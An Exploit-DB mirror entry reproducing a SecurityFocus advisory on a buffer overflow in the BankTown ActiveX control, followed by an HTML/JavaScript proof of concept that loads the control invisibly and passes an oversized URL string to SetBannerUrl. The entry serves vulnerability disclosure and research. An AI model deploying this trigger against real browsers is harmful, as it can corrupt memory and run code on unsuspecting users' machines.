exploit-db-mirror/exploits/windows/remote/27806.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
989 B
Text

source: https://www.securityfocus.com/bid/17815/info
BankTown ActiveX control is prone to a buffer-overflow vulnerability. The software fails to perform sufficient bounds-checking of user-supplied input before copying it to an insufficiently sized memory buffer.
Invoking the object from a malicious website may trigger the condition. If the vulnerability were successfully exploited, this would corrupt process memory, resulting in arbitrary code execution. Arbitrary code would be executed in the context of the client application.
<snip code>
<BODY>
<OBJECT id="GotBT" width=0 height=0
classid="CLSID:C572979D-8383-4CCA-A37A-0F7CC3B62D81"
CODEBASE="http://download.banktown.com/XXXXXXXXXXXXX/BtCxSFM20F.cab#version=1,4,2,51817">
</OBJECT>
<script language=javascript>
<!--
function go() {
var str1 = "Hacked";
var str2 = "http://www.hacked_X_.org/Magic_length/Magic_strings";
val = GotBT.SetBannerUrl(str2, str1);
}
go();
</SCRIPT>
</body>
</snip code>